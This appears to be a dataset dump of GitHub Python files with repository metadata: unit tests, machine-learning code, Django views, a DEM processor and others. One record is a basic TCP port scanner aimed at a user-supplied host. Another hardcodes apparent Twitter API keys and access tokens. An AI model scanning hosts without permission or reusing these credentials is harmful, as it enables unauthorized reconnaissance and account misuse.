blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8c650db903e4c481af2d57614db70fd99846e0d2 | 6ebb264379c41c8e22bf89bb482d56de1a2f2e50 | /tests/unit/test_sum.py | fe4cc3aa315276e8d4f493317f4ece75063ae710 | [] | no_license | axen22/unitTest3 | 864cce48660312398db3546382375f720e74b7ac | 38b9e7b37941def9c8a90665107b87a6579925a2 | refs/heads/master | 2020-07-28T07:04:10.491348 | 2019-09-18T15:43:33 | 2019-09-18T15:43:33 | 209,346,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | #another way to do this
#target = __import__("my_sum.py")
#sum = target.sum
import unittest
from fractions import Fraction
from my_sum import sum
class TestSum(unittest.TestCase):
def test_list_int(self):
"""
Test that it can sum a list of integers
"""
data = [1, 2, 3]
result = sum(data)
self.assertEqual(result, 6)
def test_list_fraction(self):
"""
Test that it can sum a list of fractions
"""
data = [Fraction(1, 4), Fraction(1, 4), Fraction(2, 4)]
result = sum(data)
self.assertEqual(result, 1)
def test_bad_type(self):
data = "banana"
with self.assertRaises(TypeError):
result = sum(data)
if __name__ == '__main__':
unittest.main() | [
"53572480+axen22@users.noreply.github.com"
] | 53572480+axen22@users.noreply.github.com |
c2fd4c3fec6f8deacabcdb8e6a1f219e8f2805bd | a20f21f0737002e3fb3e8345c42f2f46aaefab7d | /Weather Report/TwitterToMongo.py | 558b800e0079be39bccb42359abeb41838cac9c4 | [] | no_license | akokaz1/PMG | 22a5c2dad1d38de013f73b314365e01890aeddff | a9db139d728765ef6c03140eba2f2c6861b37e91 | refs/heads/master | 2021-01-20T07:57:00.178171 | 2016-12-02T14:46:46 | 2016-12-02T14:46:46 | 68,720,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | from twython import TwythonStreamer
from pymongo import MongoClient
client = MongoClient()
db = client.twitter
tweets = db.twitterdata
tweeter = []
class MyStreamer(TwythonStreamer):
def on_success(self, data):
if data ['lang'] == 'en':
tweeter.append(data)
tweets.insert(data)
print 'recieved tweet #', len(tweeter)
if len(tweeter)>= 3000:
self.disconnect()
def on_error(self,status_code, data):
print status_code, data
self.disconnect()
stream = MyStreamer('eAL497dT5hjs2bHLh1mRoR3cj', 'HUuqoidPWbT04QPpZfFHwpqvLvq6IxOU1kOa2eRRZf8Rh5XmtE',
'775365291555651584-hhpeCLC8VY2ccOoeWxXge6cWbamKhBG',
'zzlkNqY4eaxCZ738GXhcTPmQf2L9RkO6uZot93a2ZJoF7')
stream.statuses.filter(track='london avalanche\
,london balmy\
,london black ice\
,london blizzard\
,london blustery\
,london breeze\
,london cloud\
,london cloudy\
,london cold\
,london condensation\
,london dew\
,london downburst\
,london downpour\
,london drizzle\
,london drought\
,london dry\
,london flood\
,london fog\
,london forecast\
,london freeze\
,london freezing\
,london frost\
,london gale\
,london gust\
,london gustnado\
,london hail\
,london haze\
,london heat\
,london heatwave\
,london humid\
,london humidity\
,london hurricane\
,london ice\
,london icicle\
,london lightning\
,london mist\
,london muggy\
,london overcast\
,london permafrost\
,london rain\
,london rainbands\
,london rainbow\
,london sandstorm\
,london sleet\
,london slush\
,london smog\
,london snow\
,london snowstorm\
,london storm\
,london summer\
,london sunrise\
,london sunset\
,london temperature\
,london thaw\
,london thunder\
,london thunderstorm\
,london tropical\
,london visibility\
,london warm\
,london weather\
,london wind\
,london winter')
#tweets.insert_many(tweeter)
| [
"alikokaz@live.co.uk"
] | alikokaz@live.co.uk |
d705d8ae5e78e993dd20c7d1b1c4e43f687428c5 | 490ed3946708791a188c6f375b1986ba1fb7d386 | /build/lib/keras_bert_ner/utils/.ipynb_checkpoints/predict-checkpoint.py | 3efcaa50da311647a86771cd08b39325e51e3874 | [
"MIT"
] | permissive | gm19900510/keras-bert-ner | 123c40487b5a20d6be49b1d808a832ccd3d2a489 | 6b37b23623544e7e1ec59a0b12ac92bff2b69182 | refs/heads/master | 2020-09-01T12:11:13.456500 | 2019-10-31T09:50:24 | 2019-10-31T09:50:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import codecs
import pickle
import numpy as np
from keras.models import load_model
from ..bert4keras.layers import custom_objects
from ..bert4keras.utils import Tokenizer
from ..decode.viterbi import Viterbi
from keras_contrib.layers import CRF
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy
__all__ = ["build_trained_model", "get_model_inputs"]
custom_objects["CRF"] = CRF
custom_objects["crf_loss"] = crf_loss
custom_objects["crf_viterbi_accuracy"] = crf_viterbi_accuracy
def build_trained_model(args):
if args.device_map != "cpu":
os.environ["CUDA_VISIBLE_DEVICES"] = args.device_map
else:
os.environ["CUDA_VISIBLE_DEVICES"] = ""
token_dict = {}
with codecs.open(args.bert_vocab, "r", encoding="utf-8") as f:
for line in f:
token = line.strip()
token_dict[token] = len(token_dict)
tokenizer = Tokenizer(token_dict)
model = load_model(os.path.join(args.model_path, args.model_name), custom_objects=custom_objects)
with codecs.open(os.path.join(args.model_path, "id2tag.pkl"), "rb") as f:
id2tag = pickle.load(f)
viterbi_decoder = Viterbi(model, len(id2tag))
return tokenizer, id2tag, viterbi_decoder
def get_model_inputs(tokenizer, src_data, max_len):
tokens, segs = [], []
for item in src_data:
res = tokenizer.encode(item, first_length=max_len)
tokens.append(np.array(res[0]))
segs.append(np.array(res[1]))
return tokens, segs | [
"liushaoweihua@yiwise.com"
] | liushaoweihua@yiwise.com |
46e7c0ebfd167b48434b11d94b7ebaa0bb8cb136 | 2cad173dd3d6a378d805592eb71ce7261d5c3f98 | /Get Files From Directory Dynamically.py | 2c2c91a352b777dfe8c93333dd85c599f1ac5526 | [] | no_license | souravbanerjeewb/Code | b4ae2fd2d1157d98c5d01ad2c2e3fe5758f0a17e | bd1bcdc06a4b1a03c067cf34aeb6ae5000dc8732 | refs/heads/master | 2023-01-04T08:10:24.710146 | 2020-10-27T17:25:15 | 2020-10-27T17:25:15 | 112,154,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 221 | py | import glob, os
#*****Define the directory******
os.chdir("D:/Files")#***Change the directory as requered
#*****Loop to get the txt files and display the name
for file in glob.glob("*.txt"):
print(file)
| [
"noreply@github.com"
] | souravbanerjeewb.noreply@github.com |
65aad1bfe5b4d4756f2c8145c69dbdeaceda54b0 | 061fbd9e1d9bed1c88d5660211e9172401d5c108 | /venv/bin/easy_install | e3a56dc6a003370abaaa757ad43060e0d5c2f3fd | [] | no_license | PrachiJani13/mypythonproject | 5838302f1b9dd433dd9daf248f51d012072f7eaf | 3aa81e5d1175f4f369e49eb0faee046ee1668b1c | refs/heads/master | 2020-09-17T11:08:07.125757 | 2019-11-26T02:35:00 | 2019-11-26T02:35:00 | 224,083,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | #!/Users/prachijani/workspace/myprojectpython/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"prachi.jani@sjsu.edu"
] | prachi.jani@sjsu.edu | |
ab8659e73eca39e44cbcc460da6ce495f4024307 | 1b8ffe50059dff352206da41d40a6cab12744864 | /PortScanner.py | cc6cd65670f145625b93d510c0c9d7f1efcc60bc | [] | no_license | XD-Coffin/PortScanner | f4bca444a98115aee5eaa6e11e7b77f23a069ab7 | 299e3947ee0fc84c3af80370498fe357f1aabe60 | refs/heads/master | 2022-12-20T08:58:47.745548 | 2020-10-20T00:41:31 | 2020-10-20T00:41:31 | 305,545,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | import socket
import sys
import os
import time
os.system("color a")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host = input("Enter the host's ip address you want to scan: ")
print("""
1. Specific Port
2. All 1000 Ports
""")
option = int(input("Enter the option you want to use: "))
if option == 1:
port = int(input("Enter the port: "))
if s.connect_ex((host,port)):
print(f"Port {port} is closed")
else:
print(f"{port} Port is open")
elif option == 2:
for port in range(1000):
if s.connect_ex((host,port)):
print(f'Port {port} is closed')
else:
print(f"{port} Port is open")
port+=1
# print("Coded by Sahil Singh.")
time.sleep(6)
sys.exit()
| [
"np01nt4a190175@islingtoncollege.edu.np"
] | np01nt4a190175@islingtoncollege.edu.np |
e98c9e6e4e8e98f0eb86148a6604600fbb0f969e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part002645.py | 26c00d84fbe342c060edabef02fe3c69582a4427 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher122210(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.2.1.2.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.2.1.2.1.0_1', 1, 1, S(1)), Mul)
]),
1: (1, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.2.1.0', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher122210._instance is None:
CommutativeMatcher122210._instance = CommutativeMatcher122210()
return CommutativeMatcher122210._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 122209
if len(subjects) >= 1 and isinstance(subjects[0], Pow):
tmp1 = subjects.popleft()
subjects2 = deque(tmp1._args)
# State 123779
if len(subjects2) >= 1:
tmp3 = subjects2.popleft()
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.2.1.1', tmp3)
except ValueError:
pass
else:
pass
# State 123780
if len(subjects2) >= 1:
tmp5 = subjects2.popleft()
subst2 = Substitution(subst1)
try:
subst2.try_add_variable('i2.2.1.2.1.2', tmp5)
except ValueError:
pass
else:
pass
# State 123781
if len(subjects2) == 0:
pass
# State 123782
if len(subjects) == 0:
pass
# 0: x**n
yield 0, subst2
subjects2.appendleft(tmp5)
subjects2.appendleft(tmp3)
subjects.appendleft(tmp1)
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
002d43df6b57bde48d6fb3e45f4ec7e76b5e5901 | bf0b6a4973f2c565e71fb3c0171ee2039464fa55 | /duckietown_rl/vae.py | abd23b158ece8ca81ee87d15f51cc7233499e464 | [] | no_license | duckieT/duckietown_rl_ddpg_vae | d891d5dc15bc05fbe2c0e5f4281beb363c660de1 | 739210584fb9a4028887a3e2d420a1b3686952b1 | refs/heads/master | 2020-04-18T06:42:09.426461 | 2018-11-14T06:03:19 | 2018-11-14T06:03:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,592 | py | from __future__ import print_function
import torch
from torch import nn, optim
from torch .nn import functional as F
from torchvision .utils import save_image
import numpy as np
# hyperparameters
input_image_size = (480, 640)
input_image_channels = 3
image_dimensions = input_image_channels * input_image_size [0] * input_image_size [1]
feature_dimensions = 1000
encoding_dimensions = 40
learning_rate = 1e-3
# test hyperparameters
test_reconstruction_n = 8
test_sample_n = 8
def thing ():
class thing (dict):
def __init__(self):
pass
def __getattr__(self, attr):
return self [attr]
def __setattr__(self, attr, val):
self [attr] = val
return thing ()
def params ():
import argparse
import os
import sys
parser = argparse .ArgumentParser (description = 'vae x ducks')
parser .add_argument ('--train', type = str, required = True, metavar = 'path', help = 'path to a folder containing training images for the vae')
parser .add_argument ('--test', type = str, default = None, metavar = 'path', help = 'path to a folder containing test images for the vae (default: training dataset)')
parser .add_argument ('--init', type = str, default = None, metavar = 'path', help = 'path to a trained model file for initializing training')
parser .add_argument ('--learning-rate', type = float, default = learning_rate, metavar = 'n', help = 'learning rate for adam (default: ' + str (learning_rate) + ')')
parser .add_argument ('--feature-dim', type = int, default = feature_dimensions, metavar = 'd', help = 'number of feature dimonsions (default: ' + str (feature_dimensions) + ')')
parser .add_argument ('--encoding-dim', type = int, default = encoding_dimensions, metavar = 'd', help = 'number of encoding dimensions (default: ' + str (encoding_dimensions) + ')')
parser .add_argument ('--batch-size', type = int, default = 10, metavar = 'n', help = 'batch size for training (default: 10)')
parser .add_argument ('--epochs', type = int, default = 10, metavar = 'n', help = 'number of epochs to train (default: 10)')
parser .add_argument ('--activation', type = str, default = 'relu', choices = ['relu', 'leaky_relu', 'selu'], metavar = 'a', help = 'activation function in the hidden layers (default: relu)')
parser .add_argument ('--log-interval', type = int, default = 10, metavar = 's', help = 'how many batches to wait before logging training status (default: 10)')
parser .add_argument ('--seed', type = int, default = 1, metavar = 's', help = 'random seed (default: 1)')
parser .add_argument ('--no-cuda', action = 'store_true', default = False, help = 'disables CUDA training')
parser .add_argument ('--out', type = str, default = None, metavar = 'path', help = 'path to a folder to store output')
parser .add_argument ('--out-model', action = 'store_true', default = False, help = 'output model_n.pt')
args = parser .parse_args ()
trainer_args = thing ()
trainer_args .train = args .train
trainer_args .test = args .test or args .train
trainer_args .learning_rate = args .learning_rate
trainer_args .batch_size = args .batch_size
trainer_args .epochs = args .epochs
trainer_args .log_interval = args .log_interval
trainer_args .seed = args .seed
trainer_args .cuda = not args .no_cuda and torch .cuda .is_available ()
trainer_args .init = args .init
trainer_args .out = args .out
trainer_args .out_model = args .out_model
model_args = thing ()
model_args .feature_dimensions = args .feature_dim
model_args .encoding_dimensions = args .encoding_dim
model_args .activation = args .activation
os .makedirs (trainer_args .out, exist_ok = True)
if os .listdir (trainer_args .out):
print ('Warning: ' + trainer_args .out + ' is not empty!', file = sys .stderr)
return trainer_args, model_args
def load_samples (path, cuda = True):
import os
import tempfile
from torch .utils .data import DataLoader
from torchvision import datasets, transforms
image_folder_path = tempfile .TemporaryDirectory () .name
os .makedirs (image_folder_path)
os .symlink (os .path .realpath (path), os .path .join (image_folder_path, 'data'))
cuda_args = {'num_workers': 1, 'pin_memory': True} if trainer_args .cuda else {}
return DataLoader (
dataset = datasets .ImageFolder (image_folder_path, transform = transforms .ToTensor ()),
batch_size = trainer_args .batch_size,
shuffle = True,
**cuda_args)
def out_file (filename):
import os
return os .path .join (trainer_args .out, filename)
def load_state ():
return torch .load (trainer_args .init) if trainer_args .init else {}
def save_state ():
torch .save ((
{ 'epoch': epoch
, 'rng': torch .get_rng_state ()
, 'model': model .state_dict ()
, 'optimizer': optimizer .state_dict () })
, out_file ('state_' + str (epoch) + '.pt'))
if trainer_args .out_model:
torch .save ({ 'model': model .state_dict () }
, out_file ('model_' + str (epoch) + '.pt'))
class VAE (nn .Module):
def __init__ (self, image_dimensions, feature_dimensions, encoding_dimensions, activation, **kwargs):
super (VAE, self) .__init__ ()
self .activation = activation
self.img_dim = image_dimensions
self.feat_dim = feature_dimensions
self.encode_dim = encoding_dimensions
self .fc1 = nn .Linear (image_dimensions, feature_dimensions)
self .fc21 = nn .Linear (feature_dimensions, encoding_dimensions)
self .fc22 = nn .Linear (feature_dimensions, encoding_dimensions)
self .fc3 = nn .Linear (encoding_dimensions, feature_dimensions)
self .fc4 = nn .Linear (feature_dimensions, image_dimensions)
self.device = torch .device ('cuda' if torch.cuda.is_available() else 'cpu')
def encode (self, x):
if(type(x) is np.ndarray):
x = x.reshape(-1, self.img_dim)
x = torch.from_numpy(x).type(torch.FloatTensor).to(self.device)
else:
x = x.view(-1, self.img_dim)
if self .activation == 'relu':
h1 = F .relu (self .fc1 (x))
elif self .activation == 'leaky_relu':
h1 = F .leaky_relu (self .fc1 (x))
elif self .activation == 'selu':
h1 = F .selu (self .fc1 (x))
else:
raise Exception ('unknown activation', self .activation)
return self .fc21 (h1), self .fc22 (h1)
def reparameterize (self, mu, logvar):
std = torch .exp (0.5 * logvar)
eps = torch .randn_like (std)
return eps .mul (std) .add_ (mu)
def decode (self, z):
if self .activation == 'relu':
h3 = F .relu (self .fc3 (z))
elif self .activation == 'leaky_relu':
h3 = F .leaky_relu (self .fc3 (z))
elif self .activation == 'selu':
h3 = F .selu (self .fc3 (z))
else:
raise Exception ('unknown activation', self .activation)
return torch .sigmoid (self .fc4 (h3))
def forward (self, x):
if(type(x) is np.ndarray):
x = x.reshape(-1, self.img_dim)
x = torch.from_numpy(x).type(torch.FloatTensor).to(self.device)
else:
x = x.view(-1, self.img_dim)
mu, logvar = self .encode (x)
z = self .reparameterize (mu, logvar)
return self .decode (z), mu, logvar
# Reconstruction + KL divergence losses summed over all elements and batch
def objective (recon_x, x, mu, logvar):
BCE = F .binary_cross_entropy (recon_x, x .view (-1, image_dimensions), reduction = 'sum')
# see Appendix B from VAE paper:
# Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014
# https://arxiv.org/abs/1312.6114
# 0.5 * sum (1 + log (sigma^2) - mu^2 - sigma^2)
KLD = -0.5 * torch .sum (1 + logvar - mu .pow (2) - logvar .exp ())
return BCE + KLD
def train (epoch):
model .train ()
total_train_loss = 0
for i, (batch_sample, _) in enumerate (train_sampler):
batch_sample = batch_sample .to (device)
optimizer .zero_grad ()
recon_batch, mu, logvar = model (batch_sample)
loss = objective (recon_batch, batch_sample, mu, logvar)
loss .backward ()
total_train_loss += loss .item ()
optimizer .step ()
if i % trainer_args .log_interval == 0:
print ('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}' .format
( epoch
, i * len (batch_sample)
, len (train_sampler .dataset)
, 100. * i / len (train_sampler)
, loss .item () / len (batch_sample)))
train_loss = total_train_loss / len (train_sampler .dataset)
print ('====> Epoch: {} Average loss: {:.4f}' .format (epoch, train_loss))
def test (epoch):
model .eval ()
total_test_loss = 0
with torch .no_grad ():
for i, (batch_sample, _) in enumerate (test_sampler):
batch_sample = batch_sample .to (device)
recon_batch, mu, logvar = model (batch_sample)
total_test_loss += objective (recon_batch, batch_sample, mu, logvar) .item ()
if trainer_args .out and i == 0:
test_batch_size = min (batch_sample .size (0), trainer_args .batch_size)
n = min (test_batch_size, test_reconstruction_n)
comparison = torch .cat (
[ batch_sample [:n]
, recon_batch .view (test_batch_size, input_image_channels, input_image_size [0], input_image_size [1]) [:n] ])
save_image (comparison .cpu (), out_file ('reconstruction_' + str (epoch) + '.png'), nrow = n)
test_loss = total_test_loss / len (test_sampler .dataset)
print ('====> Test set loss: {:.4f}' .format (test_loss))
if trainer_args .out:
encoding_sample = torch .randn (test_sample_n ** 2, model_args .encoding_dimensions) .to (device)
image_sample = model .decode (encoding_sample) .cpu ()
save_image (image_sample .view (test_sample_n ** 2, input_image_channels, input_image_size [0], input_image_size [1])
, out_file ('sample_' + str (epoch) + '.png'))
"""
trainer_args, model_args = params ()
torch .manual_seed (trainer_args .seed)
train_sampler = load_samples (trainer_args .train, trainer_args .cuda)
test_sampler = load_samples (trainer_args .test, trainer_args .cuda)
device = torch .device ('cuda' if trainer_args .cuda else 'cpu')
model = VAE (**model_args) .to (device)
optimizer = optim .Adam (model .parameters (), lr = trainer_args .learning_rate)
epoch_offset = 1
state = load_state ()
if 'rng' in state:
torch .set_rng_state (state ['rng'])
if 'model' in state:
model .load_state_dict (state ['model'])
if 'optimizer' in state:
optimizer .load_state_dict (state ['optimizer'])
if 'epoch' in state:
epoch_offset += state ['epoch']
for epoch in range (epoch_offset, epoch_offset + trainer_args .epochs):
train (epoch)
test (epoch)
if trainer_args .out:
save_state ()
"""
| [
"richielyl@hotmail.com"
] | richielyl@hotmail.com |
4db5502b3cb8b1723df8a7ac89467e02e213fda7 | d83f50302702d6bf46c266b8117514c6d2e5d863 | /counting-bits.py | f875bfed4d8a2d111f435b9c52cfced316a0c179 | [] | no_license | sfdye/leetcode | 19764a6bdb82de114a2c82986864b1b2210c6d90 | afc686acdda4168f4384e13fb730e17f4bdcd553 | refs/heads/master | 2020-03-20T07:58:52.128062 | 2019-05-05T08:10:41 | 2019-05-05T08:10:41 | 137,295,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
ones = [0] * (num + 1)
for i in range(1, num + 1):
ones[i] = ones[i & (i - 1)] + 1
return ones
| [
"tsfdye@gmail.com"
] | tsfdye@gmail.com |
4f0d5c22413bdaacf869bf9cbd12d47bcc73f375 | 1dc753d68b234b10193962f58d306bd91957eb6d | /college/college/doctype/student_achievements/student_achievements.py | 66884338ed30206d53469c0ed0ba413e759ab9c7 | [
"MIT"
] | permissive | harshith187/college | e8612134e47c48ad721840f684362f7348e9bad4 | d9ae21734dcde70397aead827e57fbbdcdeb98c9 | refs/heads/master | 2020-07-20T12:36:27.601134 | 2020-05-25T13:53:57 | 2020-05-25T13:53:57 | 206,641,495 | 0 | 4 | NOASSERTION | 2020-05-25T15:05:16 | 2019-09-05T19:27:37 | Python | UTF-8 | Python | false | false | 266 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, mvit ise and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class StudentAchievements(Document):
pass
| [
"frappe@ubuntu.vm"
] | frappe@ubuntu.vm |
10b624301331e971b74b1e971ab0f51ee36867b2 | 30bc1657a930cb90902a36c9e7e16e5d31ae2341 | /processDEM.py | dc3e54b92ab043e2dc05f0ffeec6c562a8882b1b | [] | no_license | Jubeku/DEM_processing | 26918dc620d216ebcd4ab9cbeb6763e87669c0fc | 0577dd5939ec4ea93bcada5faac6690feb8c0044 | refs/heads/master | 2020-08-26T16:59:03.106098 | 2019-10-29T16:01:04 | 2019-10-29T16:01:04 | 217,081,467 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,548 | py | #!/usr/bin/env python
"""
This script allows to repair, filter, and crop 2d DEM files.
Input parameters have to be specified in a file named 'input.txt'.
"""
import numpy as np
from modules.classTopo import Topo
from modules.m_PLOTS import plotDEM
def main():
### INPUT
# Read input parameter
with open('input.txt') as f:
lines = f.readlines()
k1, k2 = map(np.float,lines[1].split())
E0out, E1out = map(np.float,lines[3].split())
N0out, N1out = map(np.float,lines[5].split())
dxout, dyout = map(np.float,lines[7].split())
repair_bool = lines[ 9].replace('\n', '')
fileID = lines[11].replace('\n', '')
outID = lines[13].replace('\n', '')
# Read DEM file
with open(fileID) as f:
lines = f.readlines()
Nx, Ny = map(np.int,lines[1].split())
E0, E1 = map(np.float,lines[2].split())
N0, N1 = map(np.float,lines[3].split())
tmin,tmax = map(np.float,lines[4].split())
topo = np.loadtxt(lines,skiprows=5)
# Determine resolution of DEM file
dx = (E1-E0)/(Nx-1)
dy = (N1-N0)/(Ny-1)
xi = np.arange(0, dx*Nx+dx, dx)
yi = np.arange(0, dy*Ny+dy, dy)
print('\n Grid dimension and resolution.')
print('Nx: ', Nx, ', Ny: ', Ny)
print('dx: ', dx, ', dy: ', dy)
# Creat object with Topo class
topo = np.flipud(topo)
topoC = Topo(topo, E0, N0, dx, dy, Nx, Ny)
### PROCESSING
# Filtering
if k1 == 0.:
print('\n No filtering.')
else:
topoC.filter( k1, k2 )
# Cropping
if ( E0out == E0 and E1out == E1 and N0out == N0 and N1out == N1 ):
print('\n No cropping.')
else:
topoC.crop( E0out, E1out, N0out, N1out )
# Interpolating
if ( dxout == dx and dyout == dy ):
print('\n No interpolation.')
else:
topoC.interpolate( dxout, dyout )
# Repairing
if repair_bool == 'True':
topoC.repair()
### PLOTTING
topoC.plot( 'Processed DEM' )
### WRITING
with open(outID, 'w') as f:
f.write('DSAA\n')
f.write(' '+str(topoC.Nx)+' '+str(topoC.Ny)+'\n')
f.write(' '+str(E0out)+' '+str(E1out)+'\n')
f.write(' '+str(N0out)+' '+str(N1out)+'\n')
np.savetxt(f,(np.min(topoC.topo),np.max(topoC.topo)),
fmt=' %.1f',newline='')
f.write('\n')
np.savetxt(f, np.flipud(topoC.topo), fmt='%.3f', delimiter=' ')
if __name__ == "__main__":
main()
| [
"julian.b.kuehnert@gmail.com"
] | julian.b.kuehnert@gmail.com |
18993d6a9980af00334c5b5db42135f52700e93a | 925f9291b8d98468f17ff8b8e5d54006193ddcd0 | /bookstore/urls.py | 36c6e936740001e428aba08ea0fa667cda50af5b | [] | no_license | hamzabelatra/DjangoBookStore | 7c058469acef22228463580f6c343cb591e626eb | 5cbffd37bd093a497d18c131b532256cee19b2d9 | refs/heads/master | 2023-08-09T11:10:11.895251 | 2021-09-20T20:18:50 | 2021-09-20T20:18:50 | 408,589,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """bookstore URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"hamzabelatra1@gmail.com"
] | hamzabelatra1@gmail.com |
1253ef78db264c7b83bead8bbc79f13fb57fd0b9 | 2bdf073b9788c446342643296c6b68c353b0a5c6 | /rareapi/views/tag.py | eab977834ef18b2af0bd99de48da0dfffcf18616 | [] | no_license | nss-day-cohort-50/rare-api-rowdy-roadtrippers | f07819362a97b0b02d945c9e932ecf18375c01ea | 25122375b4f07b738a65c4bac21ff300379d831b | refs/heads/main | 2023-09-03T12:57:04.390337 | 2021-11-18T17:34:05 | 2021-11-18T17:34:05 | 428,313,351 | 0 | 0 | null | 2021-11-18T17:34:06 | 2021-11-15T15:14:38 | Python | UTF-8 | Python | false | false | 1,501 | py | from django.core.exceptions import ValidationError
from rest_framework import status
from django.http import HttpResponseServerError
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from rest_framework import serializers
from rareapi.models import Tag
class TagView(ViewSet):
def create(self, request):
try:
tag = Tag.objects.create(
label = request.data["label"]
)
serializer = TagSerializer(tag, context={"request": request})
return Response(serializer.data)
except ValidationError as ex:
return Response({"reason": ex.message}, status=status.HTTP_400_BAD_REQUEST)
def list(self, request):
tag = Tag.objects.all()
serializer = TagSerializer(
tag, many=True, context={'request': request})
return Response(serializer.data)
def destroy(self, request, pk=None):
try:
tag = Tag.objects.get(pk=pk)
tag.delete()
return Response({}, status=status.HTTP_204_NO_CONTENT)
except tag.DoesNotExist as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)
except Exception as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
class TagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = ('id', 'label')
depth = 1
| [
"matthew.singler@gmail.com"
] | matthew.singler@gmail.com |
d0e81ba6dd79dc29f6b5cd9958451e5b589b5712 | 66c723d0137c0de9fdfc4a90d3405a8b3c60a7bd | /n_step_lstm/n_step_lstm.py | cc632b6a6ca0f68a32b0e7c8f828d8f30373bd32 | [] | no_license | afcarl/test-chainer-performance | 5ccb1d451791dd96633a1bb0f7e9438688f006ad | e0802e8421f4a07b839c44ceb90cfdf188ec4b84 | refs/heads/master | 2020-03-16T11:27:36.202733 | 2017-02-21T07:21:45 | 2017-02-21T07:21:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,796 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import chainer
import numpy as np
# 長さ順にソートしておく
x1 = chainer.Variable(np.array([0, 1, 2, 3, 4], dtype=np.int32))
x2 = chainer.Variable(np.array([4, 5, 6], dtype=np.int32))
x3 = chainer.Variable(np.array([4, 5], dtype=np.int32))
x_data = [x1, x2, x3]
batchsize = len(x_data)
x_dataset = chainer.functions.transpose_sequence(x_data)
# Auto-encoderの場合
y_data = x_data[:]
y_dataset = chainer.functions.transpose_sequence(y_data)
vocab_size = 2000
n_units = 200
embedding_size = 200
embID = chainer.links.EmbedID(vocab_size, embedding_size)
embID_decoder = chainer.links.EmbedID(vocab_size, embedding_size)
# lstm = chainer.links.LSTM(in_size=10, out_size=10)
encoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
